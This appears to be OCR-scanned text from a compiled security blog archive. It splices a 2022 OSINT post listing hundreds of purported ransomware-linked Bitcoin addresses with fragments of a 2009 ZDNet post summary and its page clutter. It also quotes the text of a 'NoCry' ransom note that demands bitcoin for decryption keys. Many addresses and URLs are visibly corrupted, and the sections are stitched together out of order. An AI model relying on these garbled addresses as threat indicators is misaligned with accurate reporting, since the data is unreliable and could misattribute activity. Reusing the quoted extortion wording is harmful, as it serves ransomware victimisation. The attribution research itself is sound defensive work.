LH7NGhvcSpPmotP1Qkahy3FqVwgm9sBk7Y 
1LH7NmoedGjDdbdTQjnmt1SC8SxTdjzkgAT 
LH7pyvvKAZoZumy8XFZNJcs4SkxYVaio7U 
1LH7qzQ8SYdxFARfaKm7exbbToHuwRCDf87 
LH7WnhuZrlaSHZWaeQ39wZwEGKbQWZZjyY 
LH7wTCDRn8QBQ6AwcmHd2csvyMnN6qDa8T 
LH7WYb8SGqLD9GFK17RiSBjDM8x7aSucdL 
LH7X9AY88FKhqwQq/7aG1fKHr9zptMAQAEM 
LH84YSZQJP31aGk5HbgUWjHChFuCbz9Vjz 
LH86mUa7Quk8bn1qSUJHeKG74tdawa9gt8 
1H87uto76JmhgRRCR4HuZ6urzgax51CAhi 
LH88aoRtthrZ8AceYuQWyY47qdqTSeT4US 
LH89Dbnf4KhBUZNM8U7caVDaThUphnuBSU 
LH8A8xDHacX65EQ9GkjPjQqPoFMHAYc5Gp 
LH8AMkLg1BLhSAv6VF]Fe43keHGkLX7HPn 
Stay tuned! 


1. https://blogger. googleusercontent.com/img/b/R29VZ2x1/AVVXsEiF _PRJIf£WOERc18myS11pMrTz jHm70Zq0Grf -qYGgJE4E- 
TqpktniL9If1URw7_cQiGHFLKGYkKBJww_rb_u_38VqSJSuIqk0sPD 
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18.10.9 Exposing a Compilation of 20,000 Ransomware Themed BitCoin Transaction 
IDs and BitCoin Addresses - An OSINT Analysis - Part Four (2022-10-25 16:38) 


[1] 


NoCry Decryptor 
Ooooops All Your Files Are Encrypted ,NoCry 


Can I Recover My Files ? 


Yes, You Can Recover All Your Files Easily And Quickly 


But How ? 
Send The Required Amount And 


: I Will Send The Key To You For Decryption 
Your files will be lost on : 


See You Soon (0_0) 


About bitcoin Send $100 worth of bitcoin to this address: 
a a 
Sanur en bee bolicwana? Obitcoin LHaSk425D2EoR6dT&t6gc4wkoKnQ4iVwk 


Contact Us Show Encrypted Files 


Dear blog readers, 


I’ve decided to further extend the ransomware themed BitCoin transaction IDs and BitCoin 
addresses obtained using public sources post series with the idea to assist everyone in their 
cyber attack and cyber campaign attribution efforts. 


Sample list of publicly accessible known ransomware themed BitCoin transaction IDs and 
BitCoin addresses include: 


LH8C2wfvYiRdU4YKB4xhgfjP9A771XcKch 
LH8CitQCZES4TgNyulcWngepg3raQUmPh7 
LH8E1Nb4sTtGZbpjgyhEg2vN7Z9SvkArfk 
LH8fvMahowmkRQk6GDx92yx9yj92VUpVE] 
1H8JdoBG483)]Xzf4R691laEgD9ug5exXcCg 
1LH8Kaw3MmDzekKhsrnP1CjcjyvZW89Wp6fq 
LH8KjbPSPSGCvRLj68vF3VoYZYZMhP9nuK 
LH8LP1QjHMKVeQ7Ng9ne8E6EBgVX608qrQ 
LH8MbQRUZxjxaowZtZENkzP3MJou6rw1hL 
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5, etp: //ddanchev.blogapot.con/2009/07/4th-sns-ransoauare-variant-offered-for heal 
6. http:/ /ddanchey. blogepot.con/2009/05/8rd-ans-ransonvare- var iant~offered-for heal 
7. neup:/ /ddanchev.Plogspot.com/2009/05/ses-ransonvare-source-code-now~of fered. heal 
8. http://ologs.znet.con/security/?p-3197 

9. http: //ddanchev.blogspot . com/ 


5.9 September 


5.9.1 Summarizing Zero Day’s Posts for August (2009-09-01 15:46) 


ZNet 


News & Blogs Videos White Papers Downloads 


Ryan Naraine and Dancho Danchev 
» Moma RB cas rT imad Aterta 


Pick a blog category a | view | 


August 28th, 2009 : Th oT 

Apache.org hit by SSH key ; Spo 

compromise ! a 
FREE Video + White Paper Thought -provolang 


Categories: Aol Vous. Aches = 
be Ertatwen Sie, wie sich me Predictive Analytics 2 tetany 
cure ersthiassige Kaptarendte erricien lisst that etersect wth 


Tage: iim Apache Sof Foutdames, Osos Sauce Bran hacaine 


technology 
aly QO TakkBaks ~@ & @ 6 9) +5 business, and Me, 
u and matter to the 
world at large. Viet 
~ “ The open-source Apache Software Foundation pulled . SmartFtanet 


its Apache.org Web mite offline for about three hours 
today because of server hack caused by More from IBM 


Apache comproaused SSH key Sponsored Links 


A Devef message posted on the ste (see mage IPS, VoIP, BGP & Mu-4000: 

below) made it dear the comeromese was “net due to arry software explots Stateful Protocet Furzer, Templates Inmovate your 
in Apache aself”, but was actually caused by a compromised SSH key tagher Quality, SOLC Automabon business’ process 

_- model, play aganst 
Virus or Hoax? the market 
The Antiveus Resource since 1997 compete agarst 
Antiveus Freeware and Software others on cur 

scoreboards and 

August 28th, 2009 

~ , > or Pa « rarp * . $ 

Snow Leopard's malware protection ‘ 

rn rope e f; . y, "T'y-, ,< — 

only scans for two Trojans Enabling Real: 

Recent Entries World Business 


Transfcemation 


Categeston: Ant: views. Aacie Bonsets Brommes Mathers through [eM 


Voge Trcsec Hore. Malware. Acoie ime, Eounere. Acwece & Mainere 
aly 148 TakBxks “= & & @& © +13 


- — » The maxh hyped built malware protection into 
ee) Apcle's Snow Leopard upgrade appears to be 


The following is a brief summary of all of my posts at ZDNet’s [1]Zero Day for August. 


You can also go through previous summaries for [2]July, [3]June, [4]May, [5]April, [6]March, 
[7]February, [8]January, [9]December, [10]November, [11]October, [12]September, [13]Au- 
gust and [14]July, as well as subscribe to my [15]personal RSS feed or [16]Zero Day’s main 
feed. 
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LH8mxAkByJKkznbcXdgkePA6JJwPghxX6o) 
1H804PUtaxX4egMJ8EmEJAv2S1ZcLUNBr2Y 
1LH8QwiMfnDVDnAtMacCULTV5P9tQHc2tmR 
LH8uQX7RakohvStEGE87n6CVeQCswmgTTV 
1H8zGt9hr3TFVXvFoZQ7DYUN91DQS7YpP 
LH93Tp1GfYdQFYjyjo8bQUXDF5GYZdmdnk 
LH99uUFVvjKOSQYYAkeXq2eXSZdU8A74xD3X 
LH9fWdFzvoR6 TwmmWySnfkBSRxpu76UHVB 
Lh9JRBXhEyIgdX4EyiYD6KEN9d85L9axV 
Lh9WfAwhiCZkhtdSiwWG2in1EgF Xkfyex 
LHOWnm7ZHIQSJFEcMDjeS21nQxXxib57g9z 
LH9OZ5mMGb8P4S5kvTLhngUByc45qKfrvyYj 
LHA4xoHCDaPHQ6j2277c4M33Ftrnz368P6 
1LHa4Y7QegJL2t577XK6nSUdCYAKKQC99sG 
lHaakR7aUxu7PXNREWBr5Yh3serycdj9Wb 
LHAAyxfGfixTiBZrfqeHDUaAiWsSW3VM2T 
LHabDioG6PdSDTHbsMWcGonbxVqLRLYS8k 
lLHabFs3boLf2r8tpERh7 DWHbn6PUGEqgjF 
LHABoQ45NDzkuLSWdn5Jpz1BkGGlgsR22y 
LHad2JAcAAY23UM5hncBbKJMmMKAYMrUUe 
LHafcix2twieA5CDWYwc2Sodrk1HEx9Amu 
LHAgNYatfThx3kesNiuLyL1o7F3mexxHxd 
LHAgvgrmaKcBZY1sDT4Hph3KMD2d97bWRV 
LHagvWUCYvC6qr4bSP8BUWUZwXxXqc97Tjx4r 
LHaLK318tchfyKJS5D7ApmTLN9yq73eg5sq 
LHaPKbUV8Qz8Qn4ghpgmgoEA14G2DPvyu3 
LHaqnxeSVCb1EeDVJwwFP4SiN7W36itqvk 
LHASDyPlvzmh5Va7vdE9bJtKAs7RLnPhgql 
LHAt6éebAEgueeDGCRAuESeTwJEpHnVKUWR 
LHaU3shpLbno5kQRwFdXcth3z4PmRkyh1N 
LHauSBXgQ9kSAVr6MfyJFVBJUg3Mr7L4VF 
LHawrdzCFrrbCzv43ejkE5uDebZJcKC9Z8 
LHAXTgTNxmbJZcmPdtgx5pNh3wxt3B3KL4 
LHaZDfoYztqc4v2bhoJMaQ1s2XrYKKPvQU 
LHb1irsuEhbpqWwbH8a3QmQgih2vesmsYQ2Q 


25603 


LHb1Yc4weA3YP6pbt]qgXWXjNv4XPk6kSB) 
LHB38BoVjvYeAUb8SLbaPVTCF6Q8XCqpPH 
1HB451sxFLsAfX2ZqjQBANginJUFCfwHi2 
LHB4KgiPZ98erN2wfgHbkAEgQXmJGGQREH 
LHb56Jvslk2mgZoM6trr9MSP13vQPqoybj 
LHB78UYyfaTQYVRLGWaq3fLrBykTwo16KGF 
LHB9rjNWoG44zz1h6JTh4hxCwycNpE5HHi 
LHBCEcCW8CUe7CqFZwrGz1JNHR9tYzZ4piPM 
LHBFjftPr9KfFVKZwLUJruECWZwYyL42EL 
LHBFXjZ1v3HZzrSrPsbVEwpQTWaSpQe49i 
LHBiGstKuUT3sfvU8RW2wNdjiRZwZXtkTT 
LHbjwUpjvGRhPbb42Vn42KgoytAkqG6oVY 
LHBKZAuwdR5k5kfibanCswurgQa4Qyyca6 
LHbLFUFdo9AFGJALM9MvEV74QHD64PHVxv 
LHbMESJpr11AGj49ZAtUzxzVHFUYSZpzuE 
LHBMzttaZw1VkN9aSDXsJN1Lnhpsutko2X 
LHbNLUDMPn8X7wo9zkQV48KXXCm8T47noq 
LHboU3j6egCwEjkKPNhM4wqiLUkrqRmS]Ws 
LHbpso7t3H1x4WLgJrrCYikRLNCZeKgmk8 
LHbQJw7YhgAoQYYh9iWZokiGZfbPH1ZjCW 
LHBQmy4jEnFhpVDWw/7dvnFCvsgRFhndZcE 
LHBQOoi5fsM9VI4MkWUuQiICNov3EghinDBi 
LHbR8U9YFWh7KsMkqLfkPbLsolrJYEyEYV 
LHBs5p3BqEdqydWiSnLSp3Lqi7BPeM)7Fa 
LHBTZEZH4CCw6iTK6c79ajnehn3tGFHGLe 
LHBUWLgxyx8SMNeqoU4C6orKLqkGtgJB2V 
LHBVbDjjJ4AMYQWHhNpVrrv1NQaiLCdMzW4R 
LHbwkrYoHnbFHYKeFZ6PvgjY1Sh5ukYD8q 
LHbyqtUrPyxwFkrXdRC6u4ZMhGelmycQn7 
LHc16FWCK 1 qajAiJSQqvULDAMfCEmW4i9S 
LHC7AcCONT4UKwKZgd7mefsGLcP6SAU7WxQ 
LHC9k3nim9RRSgp7KtkAzmhkEijRLZghuWw 
LHcAssQMwHuXZJRiqobRhWBcMa98YQQIVxS 
LHCC8VU8hC9WA5WhyTdXa6R6TxvzCL5uMa 
LHCDdabYWETBaxa2g64Q)JjNZPAuJnzaoGr 
25604 


LHCDGnEt3NDwmKLk9tK1gL5s5NFhzSGSaT 
LHCdZMejRzdDE4qvJYdcjDR2DE9D6WUKL1 
LHCeL9tlAQaeEgtLsgycY6LQUMmXgVjYWSq 


LHCgWYXa6UvVH7MTaFZmmwW5EwtVx1inDevjT 


LHCLjz6900gLKSLMGhEnVQhLbA4LL8UNVL 
LHCMAYFTRsSmbTtV755hG8UjU4f7VriNaU 
LHCog5GcB6mZefZQJZt7 PNWKQFTyLBb1Hu 
LHcotPyRQU4LD9QNUKQDyrYVGBc6KXfsfu 
LHcpEMEkKKN6GnTbtQBztZYUoD6qp934H7v 
LHCQ3bNQ2czBa2ZfybrrMxq4XsoHSGugcx 
1HcrtSeAaog26fKvMsSEgC3iCYVuemkF2M 
LHCsBwn30McriJv5FR2ZRKFQd322tW1wMfB 
1lHct4cyvNBroz1RgYcGekC7CW2mMKKZrHN 
LHCT5nFtGVdUgvH6V7FEjwyJ2MhtHiLHxX2 
LHcTAsS11tHws5jYkqHNr3suMvTHqBynB1 
LHcTcMr6M6hB31JW2uMh2xnuNQ2Hnm5ciD 
LHcUBeADVWJPJ8DtSVbjPopowWBMtcF8shv 
LHCV6TTUMLV3itxzpGeV97BohodswMM48T 
LHcVGqJNzDozBJs7TrMQKcjFlLvyeLgT9} 
LHcViPcleTSVN4d8QWDCQXU3hG51dfUGXs 
LHCVJT7WaqrWUDNoYa7tEiUv8dwQGbvnLNy 
LHCvm76tKdTEHfrsVBGm3hiPRHCSHTVLf8 
LHcWH1hke5tQ6tsLC7ComCZY3FM1AuyukS 
LHcwrHzZCjLwUfkKdR4Dghh4SiFFcoTpwM6 
LHCwvgWUtFCwQC1ldwRBoyHfThKgYfGkjHs 
LHcxm8FscaxhxaNE8vRKJrNZZSKVPVD5gq 
LHCZYbaMAKSAhrUYfb4fuWewgHogF 7 Yu6B 
LHD1xxzmDyjtxxyNTVaQstXbWnCqdf87Jh 
LHD2tBKiP6xHPpVr78QCBEUX9cUrQ2EgHA 
LHd3nvWLfcXUzcC7ZPwjlAhYUvsum7fiDC 
1Hd5zaKwM7PMTTb3kPeDdyejJK4jnnhSHqH 
LHd6C1xyNmtJMQ89BpNGFEZwkiPH54nbCN 
1HD8953kDQyJHEpY6N7PonZdJjoGWvU2Aqk 
LHD8aHeQ9jtU8cTBvxrcVzm93bRs852HFs 
LHd8KFZSCGeQ3rKiBHSGExwN1NxDo9LreD 


25605 


LHD9MYwSPfVxpohPHzt1H9MrhZ1UwC2Dbw 
LHd9p6GqvcyvM7d9UVOTNMFUNjvdkYotC9 
LHdAEjieilYkdbAcXGJi7cndhK2gzAWXx9j 
LHDAW7YLEQVTnKhV9D5MGApscC5A9Y9bFF 
LHdBm1i5NsHC8h/7ryfj5Drf364uJfaxXM8i 
LHdC8mTGKxhh33UetAP3)JcMLfqvAuVkxdf 
LHdFo3uhXDG1DKA4r29H5UxQPvfiJi4yHZ 
LHDgGYtyvDJYXCajoJAB21Lb9GUZMZasqd 
LHDgiXxjW64hv6k6kpLHfsB2AppBorEk4F 
LHDKzD71WyZYcx13FnErXxpjiTEr9eqeUQH 
LHdm1FVEH9mHXCraY4KSpWT5CHVhG8PaTK 
LHdnA99m92HBuDxP9q6tXpLSomdka5Ngdn 
LHdnCLMv9nDVvBr6dor7MCf5CUqTBnM1CF 
LHdNQ2rSsfZgoZSZLFAp3boTAVFBmHwgSU 
1LHDPBpVMqPmumBEtC26xpQ8x4uwNyr62RY 
LHdPRzTdcmBD7b585W6gUDyxBT4Z6ccqc2 
LHdQhM4XuCRC14ZsqEqqbWijhyr227PHkDv 
LHDrvXAEPmArEocQvW1S3iULe218enH5yL 
LHDsKcS4RRArfuxgVKkKGUC6BSBNZmx4zjC 
LHdT6Kvw7TFwjbgCQ98med6kJz3LUKKQ6r 
LHDTK6vv7WEhQcTPRrijNoQNSMQWgBT6hh 
LHdTph8Z3KpysyJrvQBVcpnzSeKoDQ9PbhW 
LHdU8c8ZfVDiIRSTE8wCksKTnFemxkdabYp 
LHdUaWmxXiGpBij1 QWcSFrTABSEGkSSjKF2 
LHDvDNE2vzatMSzjLYE50LmvdHtdvaAfAk 
1LHdVna6q1U6eDih1vHnKwcFAT8PmXjr7pG 
LHDvrtmpgGAEPKpHpC2a44sNWAcBh]xAwn 
1He441szf4xXaG67Njpux4Akg]JJVEHocAr 
LHE5P4D37tEsjtinNELh1UCYfj/KmVnbtL9 
LHE5wcGM7mxNCcrttA1PY6LxcVzLjbU4ti 
LHE6etsTwX1HRT675pE6WdEXuRF1cBhFGE 
LHE7Ysw4RoTxqcqq5YVNiGJ2pvfCN3bDWu 
1HE87C6z18GhrskuohNXeHDRVRMD80NEVM 
LHeA4yfNSJaP3rBZMC4h359wdLzpu3qC45 
LHeAq6YX56d4VRpJuizkeCL7FyVALfjUb7 
25606 


LHeAudQYdkyh3EaHzT7lapYZDHNFn6xDWZ 
LHECS18p8m/7CfCycZ5xwihEG4EVjb7Eisy 
LHEcTyBPUira7woEQg8C6Fypj5SbZrXeeF 
1LHeDPSfXDTt5DsCCs17RNiX3sXam58uLDN 
lHeedmXYgfelMwdEYMtx4YadA4wk81hTm4 
LHefY¥de7RTVjkRKaVQsMUjiCbAjFKEDhYL 
LHEHBkUrKaLz4UFxx4A6sXGBzZMc9jKcVx1 
LHEJo6qYfSxnFmCtGE7AZCE4hgByYPrdbt9 
LHEKAkytQoRyX7Rwz89k2Qz3ATjzPdpxVs 
LHEKjJZHZtF25cTgPBj VPUxJWmqqilRUBmA 
LHEMwek4rVuSnoGaikKY6SUfgN9df8RfoWi 
LHEN9OPWWVvYr8sLqwCP9E]Jug71dHJEhJ75C 
1LHene7nTA5DKznnHDafoqyYzTSrSA2gGYcc 
LHeoDQKCDPikAg1ntfLuT5PyGok6yz3GSy 
LHErzeHQrFTVKU6EndxruVFtriz9WsaXxjZ 
1lHerzjRaHSrE30eejfqgZw3nzgwM63xs8yD 
1Hetzr3mpgYebPUketBN9OTGvVSmvkGHgHL 
LHEutcZeL6kPeJ4HU4VIHNRK3CTY17jNcF 
LHevt5hhUokf7r25u8UvHjNdjwl141licy2y 
LHEWt2n469n3poPYx9FJyyGRnmynjZCPsa 
LHEYE618LxL37EFSW1WKUoOWkKNMhPo2Hd3V 
LHEYG6x6scZnmxdWuDbzUyHpV9PSTFxRg8 
LHEZ7PKCNxf6m2LCTGEZXjX9t32AbQan18 
LHeZh5HGh3qGS3k1EW8fXH6L5jcy31Qbax 
LHezNd3o0fy8cUhPdHTAjNyxZJRdudrc4VQ 
LHF7zzAcaXR1lHewpzbGts51uMcXHH/7TjJo2 
LHf9Si7Ts2B2ySUgF8WKxT27s8e8rewdaF 
Lhf9teK6KnsTHE4 7m90UDck8QMDdqTaef 
LHFBUrLrpWF3gvpmxCg78CsqSwZwhAECAP 
LHfd3MLspktAYXrHqyfiBQm3QuXJjfS2Gs 
LHFD8yQJ4MHBc1lyifmbB7Hhoiqei2BPbwC 
LHFdB28Z4pN31i5kyDAd5TfsoRhha4xf8X 
LHFdjA99urtnRvtGBbkt5U62BZFR96zZGFq 
LHFDNVMgaP9PGGyWEpwrArichdW4vJqxu8 
LHffkqYFzg5EK7jkxXyplengVWoYkAuAQMW 


25607 


LHfGxZJzUJgkcGry4ixHX63J2ShHFErmDSX 
LHfhWiRb3CJCQLYWNZ9bHUUIXPZqRHEUFk 
LHFih1dqL3Ba6uj9R4KJaNH9ZSM4fBN5o0 
LHFL2P7ZAHpEHLK2nVw2XXog3Ep5ZNsfR1 
LHfLZUiri8kKBhAkYPPF6N4cZFKfxvBDSJV 
LHFmcJEmFAtfoquHr16Fafhh6uTcpBcHoY 
LHfNErQwok7YA3eexXi8B5032DnKb38ZWFH 
LHFNURT1rpAtrQf5zTKx4X3fbexd26FuTZ 
LHfoHatqwdRhXkDBJNeBEk4E5XncmVCbUr 
LHFpHff7fRKTNS5m30GsB9LnRfajEF 7 p6U)J 
LHfPL5XE7ZnhM9pHRNk3B7YSKFVEdoJ1D9 
LHfR11r9SAUHAGr5RxXWJNjXSFPtLG34E6t 
LHfrjvJha543RXA3yGMTQVW388zkpUZzfz3 
LHFsJDmM4bumpXpMerGQibr4skZLhsWvfbi 
LHFSLU6NLWN10GxVURJoDV9r2BhbJD7gGn 
LHfFUAV46SW3JEZRoukxXtyRvsYJJoZMDUGi 
LHfunUqgezLq2M9yn2pe664dibYcj298kN4 
LHfUptnpc59JRVhHBouyuZ3uxzFRBAKQakF 
LHFVq8v1FiRYD8YJgXs13GNh6srMmWPAi4 
LHFvSaQvNo5WTC5o0FdiGc8LPrch3U6GqSX 
LHfvuAFNEBHqHXdcDC2qDN46dvZAdmRSLN 
LHFWzDjEbk4ViIN7QD3zZDN3VG42YTinkmrF 
LHfY1xhF6Sn1ZxrGm8fdxVz3XdLXBrQVro 
LHfyVSqUn1lygnRk1tuLi4dGyUudCPUFU5Yh 
LHfyyWLYUDF 7bbZinQvn7ojJ5sq7ggpaBp 
LHFZpNtZXqNvjc7ivEDWVjJmfpLnuZ312ws 
LHg7NvnQbAdrp2BmhZeaz1kri5UUw29ZKk 
LHGbMe7ac76HQuqxBcB49VLuv8ukYuL5sB 
LHGDWr5ZBrYVaC6Xp5bcXePq9bYVuzt7Mr 
LHGEaFjQkksQjxqru4LFALT DodbhgLfcrE 
LHgEK7VQCnQpvSnXjVEB5Xs7Kb59AU8TWv 
LHgf8CyjK430Gv8hWvuzFNWd1YpmUi5Pe4 
LHgf9GR1yCpEEG9o0L3HgHRsrQoKVwépsyQ 
LHGHqKd24cFeVMZE9pv6Y9yBLcghr3s7e} 
LHgj4atGusSBC8piJ477g87FLdqZfDmuK7 
25608 


LHGPjpup2hbakZgizCfqcdbYHG6fdK2qsg 
LHGqlevaHxBzzyY8NuiTLUbdhfRJQJ7Z9d 
LHGqXeSGuj3RVYd1wu5CaH4FcVMgYmyir 
LHGtpgsPKJD9q9gHCk29Y9cU8XvyzAdimh 
LHgtQEkmGxBhzdxgUpKWMxVMnKQ3n5WKPF 
LHGX2Z7r3Jrr5D7LPM5i26NDg TwXtmnueW 
LHgxCg6flMbPZBke35dxjMg1lwrdwcQ66e6 
LHgxilSZSEknBdsum459t26Yto4DSpJxZV 
LHgziYpEQDqg8TJhZeoxcSx9S9P7VteLuWu 
LHgzyAu5UyC14BEFR1IUTXWLfAUAZABMWiz 
LHH4LLfF7TbrhmMK54YZAhnb7a2tWFyWvH2 
LHh5GE49YuwTr1lFwBcSJV47misqBD6Cuky 
LHh89HCpS8UUgJnKDx4QQMBMYk2JZV2NTH 
LHhAEehbbyUffPhL4HgfkKiTEKVLDGnT39k 
LhHDrLTYnmNCww7mQAhCbKyVW2cGQQkqM 
LHHE7EeSWQTrdti8Mx4bcWiVct8C7soDd1 
LHHgNrjy77z9mSzh58npBw8pDVWssVSHcD 
LHHGskn3sP2uBi32Jpz7ULHMcVAD4Gjwn3 
LHhh5tazhD5Xduxx6doY8nQ1sgZWt87FfRt 
LHHHVGeAgqhdBREYRhcydb9KyxFuQeraUx5 
LHHKxVFK2MoxXrZS9KHebkiSsokgkqYAAcK 
LHHMLJm6piVCxwvJ8DBjm17uCDjfq6fpkP 
LHhpZrx97FZkKVONWT6bZHTHX7rSYsCmRhv 
LHHqhHJ84Hempxy 7jsxNAiW8CZFMNTARB 
LHhR8hpfrHHgg9SScrsyB6nE1r2hjtxwWFN 
LHhRgqDxYqGzL5r4BYapmi7fPacSnpaqw52 
LHHssRJGTTpitAJLVNx67wTyzpWxYFi5H8 
LHHtfCssGJVIBNZ3Qb9QLzTFva/76ZCjZEb 
LHHTv9ZH5wfbN8XrHL9ViCJebH5VPn8ANS 
LHhU41APLMovnTY7LZW5N4Hy3a3NsbksqT 
LHhUFyaR7KjszVuNu3bQ5vpU1vraaSprvh 
LHHUojiWJjL77qGEtudZQVfYd4qk2BwZwG 
LhHvwtzkAGydYWH5qyLBE8hehcrp8o0P2x 
LHhz2rybWTia5uAi4n2eomnzXxX4v2iyVk35 
LHi4HhrAaggvstjBjjxoZLsFj247ptYZXw 


25609 


LHi8Qd5dduvE5jTfujrxPjZ2ZsGpi8Qxjw 
LHieQMaE5dwzecxXfEGNn79pkxXD1ZpmBswU 
LHiIIGW93jt5Cx3gcGdfMZoWMSqvc9nFale 
LHiiIhNVg2QMtRn9pSuCW7CCOFAj2SKebNDF 
1Hikxwps8elesBuH8YEnkK4yd1U8keUCA1h 
LHinVmbCErwcxXLsurddXR1jsi9ceSsi246 
LHioSaSoT9q3WQ7zyF99hgee7uQsPFfcE5]} 
LHipBHMFTG998WFcpZhgdSfAagWb3sn97j 
LHiIRVSq6vp77ewyaF6hEkRIBFvZgMmzmyY 
LHiISCLCH8k7bCGEjT4uaHec2gWbpiftxsn 
LHiVeCTQPgybtpcXwLSHA5dCtyVckPF3kd 
LHJ17bYwwtqmVe8HpE4PPHDhtyYUjukDE3y 
LHj3ZeQ4CM1nuZ8szt3Uxg4WpuR68hK2hD 
LHj4hJMavrloygHqw2TxXbfQQs2gZYxBqn 
LHjJ4TW9AAMTOTZZdHmwC9HCN3V36c2Vmg} 
LHJ5XvTiECtzP9RkKRqP4RpaboULvetmGzx 
1HJ76tJ)CUh45gzJHqd4kNe7QTF5W)JBjtVi 
1LHj7DFziiSghBoiddCp9AzJPVyXiBNHoyn 
LHJ9891ztho4qMWnrvzjJLgV2mPT5msbajo 
LHjaiCQDoASyF 2tnZvo8U8cwhu3FmakfvZ 
LHJcGFQpf1xX4zFyfga9MUhPktv3eShnSU7 
LHjCtUtGpSGWoekJ9UZmsCupVCsUiDjKpx 
LHJD92Kqm7KSm24AmeHi9PPWDFc2hSpsta 
LHJDU9dVDQ34aQ9v6XWBHatzAVgaYLCrv 
LHjFnzZpCVrBN51HMUxMUuMN75hME151cAW 
LHJG9ETyh63eXW2xdDvuEQkZHON694RXER 
LHjgkZFRPgNmZgFc5gAEJfGZmAdDMSKZJL 
LHjiXwloYvvYwsgiMbyvGqyK4VYvLBKKem 
LHJj2wRdhhSHDsff4uyXZQsrq25zMhsZig 
LHjKpqwxXjtBUC1LvL2zYZ22tdEU1TEnoXc 
LHjLSA1TBPfGYPGAWT 3rzt312cEDvkZxyh 
LHjJM6viymWPwgMXdFViQUsaXUSWHLd516p 
LHJMb6gx1cMJ7aJjtuPUoHy3kXLSWSqCte9 
LHJmom5b6JamwwiHF81jCY4hytrshfikgC 
LHJoQjlychzKkbN9OSNe93vVE9NWMp9tWdvUF 
25610 


LHjoYWFo7BBDHWyZ3hh9EdRp8sftPZKDGuH 
LHJpQ8EXDqNAMXx5wFAtxQdy6EdBcgkBzu 
LHJqgDXugGuHkvXg7pPybzBT12368z7d TAF 
LHjJRCpBEDKt4Kwhf6RwSgi24yqH1inZzZ1m 
LHJRdTXy8Ya7cVg6VDjxm4jLghVwyUaz3A 
LHjTG7L3BrtEqCtPZDBv8x3Wkt3tH5mEMw 
1LHJuz8J3YFoajP4KMRgH7LxktoNwoie]pR 
LHjJWHArGfBtFdG8NhPusLX1yEPE4ygqGoa 
LHJwYVxqCD8vEbw2nrj8gjLBVT5BE7fG7hp 
LHjXeKnNpHP239CJQGSarQsNnDGBZwwwat 
1LHJyeyb3LUx4pUoHLoboSaeS7LkuuDjL4A 
LHJYLKtyDMcGfZNDumUesfPmTsYvxXju9c3 
LHJZ5QKSgPbV3U9cLfat9qzx9pKQnsLAA3 
LHjJZDN9gsApBuJPhi9sehYin3L8W5hjc37 
1Hk1GaZczJJGoQXG8SuiIGMBYDNbDWAhZyp6 
LHk6aqnZKa8iS8T4SGaptZFQezDB1A5uzXxX 
LHk6LTvnMZvHhaT71p9bzxnJgqxM32pcds 
LHk7oVwhdhHEy5n3tZAHsPFW1q11Jr5k21 
LHk8kp84a6wXqGqKU12iT9ySNAtPQdJJN9 
LHK9YONpC8izKBhimbq1ChTg6kRFidgUcp 
LHkAwzG3cLTz4rCNsBKxgEM2y2HyAYFmVA 
LHkcFD9vTqSAVxwk8yeCC5Ak8uDfnhGffk 
LHKCoGgu157PjH7zjotMguuwi86rwmQbu4 
LHkdNAcqzMMLb2Lh8j6EAMbVSUE4SsAeAv) 
LHKeTKAIntdqHNr5U1aUjL7fyzyMoGFQdM 
LHKf5wtD3NwM58FHN5tYs3wpeDaKkwEDHf 
LhKfsWx24UcEijFyc6RTUIDWyp5dikFCu 
LHKg4md54wBbMhefnvJTxaDbrr3Rp4D8Z1 
LHkGVvEuvNBRgYsLuwqS45AY7hzMBYcvyUU 
LHKiqWq3FpbP5uAA9xP1rrPobMzADDCe71R 
LHKLCG4jDHozzC2q2Pzh19kGyxakdxX6Ewa 
LHkmmxDtrFFc7UHZj4k8fjuz8nTskYehu5 
LHKN2jbf6ZP7q1LdBjLUqPwgxBWv4tuDmM 
LHKnVMZZuYEYxzLdSQAFGnUYp3 LifyDvbm 
LHKopf1Bjwpb4zkxZxXiDPAUqoAkMZ8sBX9 


25611 


LHkP9t5XLKybqKK7ZYRg5u6Dhbwdi7Dh3f 
LHkSMemu2wnVQSV1imU59KugZSf3yV8Bjg6 
LHkSqRc5MZRtoJwxaCWFKY81vriyZt3KWL 
LHKsv2qKchAXZ7jPF54MqQs7MAhdGuVidp 
LHkVnvJcj52qqh2uykG3t5qX9xefxRov5H 
LHKWYWuj 1 HCBjwjRH6DLUmculRHnqGYpSc 
LHKydmrqv4san27YQ5kDtLukVhMDLP1YL5 
LHKYo9cxNUJveswMy8ubbMQzoxk4fRn6Nx 
LHkyU2nt4CUQKXauS7P7XFXcprpdMMn9wA 
LHLIneDNmHj42TELQKagqpbjj89 7nkxgr3z 
LHL3ugshbRC1UAWUp4tCaEVd5PMKeBc8Br 
LHL4xPvkE82R87pbhV2QjZ4Crf2eqwN5gE 
1LHL71LjsvspbhhKhWUyAV9XHt37s3zoy33 
LHL7WakkVarbsvkhZ8ZJd7hbKsviYbHCY4 
LHLC69ByozLkK9ffBQtxkbkXp9roEZHzpZ 
LHLcJFHSNWYVPstmnWX5r2SWmDgjejwAWp 
LHLEjcntcvSLdDZN3CrKvVdmBoSBs2D1Gm 
LHLFTBzjHtoKzX9WkCAmpZLJ5jsMj4irnx 
LhLHyzqlAnh4qgPBqLd3QQioCJjqw4gk5s 
LHLnNQ7pjcFnxZzvybPhBYrsUzhLcUjvFi 
LHLttMfrUwkBTj5Z9GASAegKtFHARDp5q3 
LHLUYf3SXVQpJ4kTF6X1CXypzmEzkHuke 
LHLvidATkKqPDPHLHg4NLoXWJZV6b5zG1pX 
LHLwkZ7q6SvpbsHzqcSdDBH4Fp68HqMnLN 
1Hm1cooBGJhHVQkP1xNxeF6BgEaSrUKU33 
LHm63Kq24tmbgqidMpWCPjG1Kc4YSY4W6CT 
1Hm7K2fkeohhEFYPZ69uCChYTw61HyAiE} 
LHm9gg5YHzk5xaznhjF17tpRg4BSHmc4k7 
LHmc6yN93DGUFfm7qr5NW2n6GL5YmjQjCK 
LHMe5nFBUUHHX8tgTxjYdxLcua9LZxhHuV 
lLHmeGeYMs1FwxsnnxXXQYzZKENrRCUAPcDWj 
LHmf7Uq6JsEU6xoDWD9p8eaB3dTdrMUVj2 
LHmgLgn44D77bntsYglyECW734Ea5606PX 
LHMmHAbiNzPw4BRipLPy5djURqwmVynJJrS 
LHMjwziC8MLkBf84PUUF vZ8fZagiyzwhFz 
25612 


Notable articles include - [17]Does Twitter’s malware link filter really work?; [18]IE8 out- 
performs competing browsers in malware protection - again, and [19]Research: 80 % of Web 
users running unpatched versions of Flash/Acrobat 


01. [20]Dead-finger tech: 3G USB Modem, Prestigio Powerbank 501 

02. [21]Does Twitter’s malware link filter really work? 

